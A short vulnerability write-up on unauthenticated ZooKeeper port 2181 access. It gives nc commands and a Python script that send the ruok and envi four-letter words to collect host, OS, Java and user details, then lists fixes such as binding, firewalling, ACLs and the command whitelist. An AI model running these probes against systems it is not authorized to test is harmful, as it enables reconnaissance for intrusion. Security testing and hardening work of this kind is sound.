Zookeeper unauthorized access vulnerability exploit
1. Vulnerability introduction
ZooKeeper is an open source coordination service for distributed applications. It is an open source implementation of Google's Chubby and an important component of Hadoop and HBase. It provides consistent services to distributed applications, including configuration maintenance, naming, distributed synchronization and group services.
ZooKeeper listens on port 2181 by default. When that port is reachable without any access control, an attacker can send the envi four-letter command and obtain a large amount of sensitive information about the system, including the host name, the Java version and installation paths, the operating system version and the user account the service runs as.
I ran into this while hunting for vulnerabilities, so I am recording it here.
2. Exploiting vulnerabilities
Connect with nc and send envi to obtain sensitive information:
echo envi | nc xxx.xxx.xxx.xxx 2181
stat: lists statistics about performance and connected clients.
echo stat | nc xxx.xxx.xxx.xxx 2181
ruok: tests whether the server is running in a non-error state (a healthy server replies imok).
echo ruok | nc xxx.xxx.xxx.xxx 2181
reqs: lists outstanding requests
envi: prints details about the serving environment
dump: lists outstanding sessions and ephemeral nodes
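The same probe scripted in Python, as an added example that is not part of the original write-up: it sends ruok to confirm the port speaks ZooKeeper without authentication, sends envi, and parses the key=value reply into a dict, keeping only the fields that leak host, OS, Java and user details. ZooKeeper answers a four-letter word and then closes the connection, so the reply is read until EOF, exactly as echo | nc does. The target host (command-line argument, default 127.0.0.1) and SAMPLE_ENVI (a reply constructed in the 3.4.x output format, not captured from a real server) are assumptions of this example.

```python
import socket
import sys

# Four-letter words discussed on this page. ZooKeeper answers each over a plain
# TCP connection on the client port and then closes the connection.
FOUR_LETTER_WORDS = ("ruok", "envi", "stat", "reqs", "dump")


def send_four_letter_word(host, port, word, timeout=5.0):
    """Send one four-letter word to host:port and return the whole reply as text.

    Equivalent to `echo envi | nc host 2181`: the server reads the four bytes,
    writes its answer and closes the socket, so read until EOF.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(word.encode("ascii"))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_envi(reply):
    """Turn an envi reply ('Environment:' header, then key=value lines) into a dict.

    Split on the first '=' only, since values may contain '=' themselves.
    Returns {} when the reply is not an environment dump, e.g. the server refused
    the word (4lw whitelist) or the port is not ZooKeeper at all.
    """
    env = {}
    for line in reply.splitlines():
        line = line.strip()
        if not line or line.endswith(":") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        env[key.strip()] = value.strip()
    return env


# envi keys that leak host, Java, OS and account details useful to an attacker.
SENSITIVE_KEYS = ("zookeeper.version", "host.name", "java.version", "java.home",
                  "os.name", "os.arch", "os.version", "user.name", "user.home", "user.dir")


def sensitive_info(env):
    """Return only the sensitive subset of a parsed envi dict, in SENSITIVE_KEYS order."""
    return {k: env[k] for k in SENSITIVE_KEYS if k in env}


def check_host(host, port=2181, timeout=5.0):
    """Probe host:port. Returns (reachable, leaked).

    reachable is True when ruok is answered with imok, i.e. the port speaks
    ZooKeeper four-letter words without any authentication. leaked is the
    sensitive part of the envi output, or {} if envi was refused or unreachable.
    """
    try:
        alive = send_four_letter_word(host, port, "ruok", timeout).strip() == "imok"
        if not alive:
            return False, {}
        env = parse_envi(send_four_letter_word(host, port, "envi", timeout))
        return True, sensitive_info(env)
    except OSError:
        return False, {}


# Constructed sample reply in the format a 3.4.x server prints for envi.
# Values are made up for this example, not captured from a real host.
SAMPLE_ENVI = """Environment:
zookeeper.version=3.4.6-1569965, built on 02/20/2014 09:09 GMT
host.name=zk-node1
java.version=1.8.0_181
java.vendor=Oracle Corporation
java.home=/usr/lib/jvm/java-8-openjdk-amd64/jre
java.class.path=/opt/zookeeper/zookeeper-3.4.6.jar:/opt/zookeeper/lib/log4j-1.2.16.jar
java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
java.io.tmpdir=/tmp
java.compiler=<NA>
os.name=Linux
os.arch=amd64
os.version=3.10.0-862.el7.x86_64
user.name=zookeeper
user.home=/var/lib/zookeeper
user.dir=/opt/zookeeper
"""


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    reachable, leaked = check_host(target)
    print("ruok answered imok:", reachable)
    for key, value in leaked.items():
        print(f"  {key} = {value}")
```

Run it as `python3 zk_probe.py 10.0.0.5`. An empty leaked dict with reachable=True is itself informative: it means the server is reachable but does not execute envi, which is what a ZooKeeper configured with 4lw.commands.whitelist looks like.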
3. Repair method
Do not expose ZooKeeper directly to the public network: bind the client port to an internal address (clientPortAddress in zoo.cfg) and firewall port 2181 so that only the cluster nodes and the clients that need it can reach it.
Add access control and choose the method that fits the deployment: enable client authentication (SASL, or the digest scheme with username and password), set ACLs on the znodes, and restrict by source IP (the ip ACL scheme or network-level filtering). Note that ACLs protect znode data but not the four-letter words; on ZooKeeper 3.4.10 / 3.5.3 and later, restrict those with 4lw.commands.whitelist in zoo.cfg (from 3.5.3 only srvr is enabled by default), and leave envi, dump and similar commands out of the whitelist.